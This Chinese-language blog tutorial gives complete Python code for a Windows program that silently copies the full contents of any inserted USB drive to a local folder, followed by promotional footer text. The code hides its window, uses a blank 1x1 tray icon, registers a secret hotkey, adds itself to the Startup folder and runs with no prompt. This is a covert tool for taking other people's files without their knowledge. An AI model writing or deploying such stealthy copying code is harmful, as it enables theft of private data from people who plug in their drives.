使用Python实现U盘数据自动拷贝!
使用Python实现U盘数据自动拷贝!
作者:mosquito_lover1
这篇文章主要为大家详细介绍了如何使用Python实现U盘数据自动拷贝,即当电脑上有U盘插入时自动复制U盘内的所有内容,希望对大家有所帮助。
功能
当电脑上有U盘插入时,自动复制U盘内的所有内容
主要特点
1、使用PyQt5创建图形界面,但默认隐藏
2、通过Ctrl+Alt+U组合键可以显示/隐藏界面
3、自动添加到Windows启动项
4、监控USB设备插入
5、按修改时间排序复制文件
6、静默运行,无提示
7、自动跳过无法复制的文件
8、配置文件保存目标路径
使用说明
1、首次运行时,按Ctrl+Alt+U显示界面
2、点击"选择目标文件夹"按钮设置保存位置
3、设置完成后可以关闭界面,程序会在后台运行
4、插入U盘后会自动复制内容到指定文件夹
静默界面
实现代码
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
|
import osimport sysimport timeimport jsonimport shutilimport ctypesfrom ctypes import wintypesimport win32fileimport win32apiimport win32conimport win32guiimport win32com.clientimport pythoncomimport win32eventimport winerrorfrom datetime import datetimefrom threading import Threadfrom PyQt5.QtWidgets import (QApplication, QMainWindow, QWidget, QVBoxLayout, QPushButton, QFileDialog, QLabel, QSystemTrayIcon)from PyQt5.QtCore import Qt, QTimer, QEventfrom PyQt5.QtGui import QIcon, QPixmapclass USBCopyTool(QMainWindow):def __init__(self):super().__init__()self.config_file = 'config.json'self.target_path = self.load_config()self.init_ui()self.setup_system_tray()self.setup_hotkey()# 添加窗口事件过滤器self.installEventFilter(self)# 启动USB监控线程self.monitor_thread = Thread(target=self.monitor_usb, daemon=True)self.monitor_thread.start()def init_ui(self):self.setWindowTitle('USB自动复制工具')self.setGeometry(300, 300, 400, 200)central_widget = QWidget()self.setCentralWidget(central_widget)layout = QVBoxLayout()self.path_label = QLabel(f'当前目标路径: {self.target_path}')layout.addWidget(self.path_label)select_btn = QPushButton('选择目标文件夹')select_btn.clicked.connect(self.select_target_path)layout.addWidget(select_btn)central_widget.setLayout(layout)self.hide()def setup_system_tray(self):self.tray_icon = QSystemTrayIcon(self)# 创建一个1x1的空白图标而不是完全没有图标blank_icon = QIcon()blank_icon.addPixmap(QPixmap(1, 1))self.tray_icon.setIcon(blank_icon)self.tray_icon.show()def setup_hotkey(self):# 注册全局热键 (Ctrl+Alt+U)self.hot_key_id = 1try:win32gui.RegisterHotKey(self.winId(), self.hot_key_id, win32con.MOD_CONTROL | win32con.MOD_ALT, ord('U'))except Exception as e:print(f"热键注册失败: {e}")def nativeEvent(self, eventType, message):try:if eventType == "windows_generic_MSG":msg = wintypes.MSG.from_address(message.__int__())if msg.message == win32con.WM_HOTKEY:if self.isVisible():self.hide()else:self.show()return True, 0except Exception as e:print(f"事件处理错误: {e}")return False, 0def load_config(self):try:with open(self.config_file, 'r') as f:config = json.load(f)return config.get('target_path', '')except:return ''def save_config(self):with open(self.config_file, 'w') as f:json.dump({'target_path': self.target_path}, f)def select_target_path(self):path = QFileDialog.getExistingDirectory(self, '选择目标文件夹')if path:self.target_path = pathself.path_label.setText(f'当前目标路径: {self.target_path}')self.save_config()def monitor_usb(self):drives_before = set(win32api.GetLogicalDriveStrings().split('\000')[:-1])print(f"初始驱动器: {drives_before}")while True:try:drives_now = set(win32api.GetLogicalDriveStrings().split('\000')[:-1])new_drives = drives_now - drives_beforeif new_drives:print(f"检测到新驱动器: {new_drives}")for drive in new_drives:drive_type = win32file.GetDriveType(drive)print(f"驱动器 {drive} 类型: {drive_type}")if drive_type == win32con.DRIVE_REMOVABLE:print(f"开始复制U盘 {drive} 内容")self.copy_usb_contents(drive)drives_before = drives_nowtime.sleep(1)except Exception as e:print(f"监控错误: {e}")time.sleep(1)def copy_usb_contents(self, drive):if not self.target_path:print("未设置目标路径")return# 获取U盘卷标名称try:volume_name = win32api.GetVolumeInformation(drive)[0]# 如果U盘没有卷标名称,则使用盘符if not volume_name:volume_name = os.path.splitdrive(drive)[0].rstrip(':\\')# 替换非法字符volume_name = ''.join(c for c in volume_name if c not in r'\/:*?"<>|')except Exception as e:print(f"获取卷标名称失败: {e}")volume_name = os.path.splitdrive(drive)[0].rstrip(':\\')target_folder = os.path.join(self.target_path, volume_name)print(f"复制到目标文件夹: {target_folder}")if not os.path.exists(target_folder):os.makedirs(target_folder)# 获取所有文件并按修改时间排序all_files = []try:for root, dirs, files in os.walk(drive):print(f"扫描目录: {root}")for file in files:file_path = os.path.join(root, file)try:mtime = os.path.getmtime(file_path)all_files.append((file_path, mtime))except Exception as e:print(f"无法获取文件信息: {file_path}, 错误: {e}")continueexcept Exception as e:print(f"扫描目录失败: {e}")all_files.sort(key=lambda x: x[1], reverse=True)print(f"找到 {len(all_files)} 个文件")# 复制文件for file_path, _ in all_files:try:rel_path = os.path.relpath(file_path, drive)target_path = os.path.join(target_folder, rel_path)target_dir = os.path.dirname(target_path)if not os.path.exists(target_dir):os.makedirs(target_dir)print(f"复制文件: {file_path} -> {target_path}")shutil.copy2(file_path, target_path)except Exception as e:print(f"复制失败: {file_path}, 错误: {e}")continuedef eventFilter(self, obj, event):if obj is self and event.type() == QEvent.WindowStateChange:if self.windowState() & Qt.WindowMinimized:# 延迟执行隐藏操作,避免界面闪烁QTimer.singleShot(0, self.hide)# 恢复窗口状态,这样下次显示时是正常状态self.setWindowState(Qt.WindowNoState)return Truereturn super().eventFilter(obj, event)def add_to_startup():try:startup_path = os.path.join(os.getenv('APPDATA'), r'Microsoft\Windows\Start Menu\Programs\Startup')script_path = os.path.abspath(sys.argv[0])shortcut_path = os.path.join(startup_path, 'USBCopyTool.lnk')shell = win32com.client.Dispatch("WScript.Shell")shortcut = shell.CreateShortCut(shortcut_path)shortcut.Targetpath = script_pathshortcut.WorkingDirectory = os.path.dirname(script_path)shortcut.save()except Exception as e:print(f"添加到启动项失败: {e}")if __name__ == '__main__':# 确保只运行一个实例mutex = win32event.CreateMutex(None, 1, 'USBCopyTool_Mutex')if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:mutex = Nonesys.exit(0)add_to_startup()app = QApplication(sys.argv)tool = USBCopyTool()sys.exit(app.exec_()) |
以上就是使用Python实现U盘数据自动拷贝的详细内容。
学习资料见知识星球。
以上就是今天要分享的技巧,你学会了吗?若有什么问题,欢迎在下方留言。
快来试试吧,小琥 my21ke007。获取 1000个免费 Excel模板福利!
更多技巧, www.excelbook.cn
欢迎 加入 零售创新 知识星球,知识星球主要以数据分析、报告分享、数据工具讨论为主;
1、价值上万元的专业的PPT报告模板。
2、专业案例分析和解读笔记。
3、实用的Excel、Word、PPT技巧。
4、VIP讨论群,共享资源。
5、优惠的会员商品。
6、一次付费只需129元,即可下载本站文章涉及的文件和软件。
